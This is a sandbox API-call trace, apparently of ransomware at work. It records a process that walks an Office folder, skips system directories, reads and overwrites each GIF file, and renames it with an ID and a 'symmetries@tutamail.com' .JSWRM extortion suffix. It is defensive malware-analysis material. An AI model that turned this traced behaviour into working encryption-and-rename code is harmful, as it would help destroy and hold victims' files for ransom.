[0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="system volume information") returned 1 [0120.799] lstrcmpiW (lpString1="ZPDIR6F.GIF", lpString2="msocache") returned 1 [0120.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0120.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR6F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0120.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR6F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR6F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0120.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0120.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.799] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0120.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.800] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16869) returned 1 [0120.800] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x41e0) returned 0x24e1d8 [0120.800] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x41e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x41e0, lpOverlapped=0x0) returned 1 [0120.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.807] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x41e0, lpOverlapped=0x0) returned 1 [0120.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.807] CloseHandle (hObject=0x314) returned 1 [0120.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0120.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0120.807] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0120.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0120.807] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR6F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir6f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.808] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.808] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5559, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR7B.GIF", cAlternateFileName="")) returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2=".") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="..") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="...") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="windows") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="recovery") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="perflogs") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="documents and settings") returned 1 [0120.808] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.809] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="system volume information") returned 1 [0120.809] lstrcmpiW (lpString1="ZPDIR7B.GIF", lpString2="msocache") returned 1 [0120.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0120.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR7B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0120.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0120.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR7B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0120.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0120.809] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0120.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.809] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0120.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.809] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21849) returned 1 [0120.810] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.810] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5550) returned 0x24e1d8 [0120.810] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5550, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x5550, lpOverlapped=0x0) returned 1 [0120.813] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.813] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5550, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x5550, lpOverlapped=0x0) returned 1 [0120.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.814] CloseHandle (hObject=0x314) returned 1 [0120.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0120.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0120.814] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0120.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.814] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0120.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.814] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.814] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0120.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0120.815] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0120.815] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5fdf, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR7F.GIF", cAlternateFileName="")) returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2=".") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="..") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="...") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="windows") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="recovery") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="perflogs") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="documents and settings") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="system volume information") returned 1 [0120.815] lstrcmpiW (lpString1="ZPDIR7F.GIF", lpString2="msocache") returned 1 [0120.815] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0120.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR7F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0120.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0120.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR7F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR7F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0120.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0120.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0120.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.816] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=24543) returned 1 [0120.816] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5fd0) returned 0x24e1d8 [0120.817] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x5fd0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x5fd0, lpOverlapped=0x0) returned 1 [0120.820] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.820] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x5fd0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x5fd0, lpOverlapped=0x0) returned 1 [0120.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.821] CloseHandle (hObject=0x314) returned 1 [0120.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0120.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0120.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0120.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0120.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR7F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir7f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0120.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.822] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae49f22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae49f22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae49f22, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1038, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR8B.GIF", cAlternateFileName="")) returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2=".") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="..") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="...") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="windows") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="recovery") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="perflogs") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="documents and settings") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="system volume information") returned 1 [0120.822] lstrcmpiW (lpString1="ZPDIR8B.GIF", lpString2="msocache") returned 1 [0120.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0120.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR8B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0120.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR8B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, 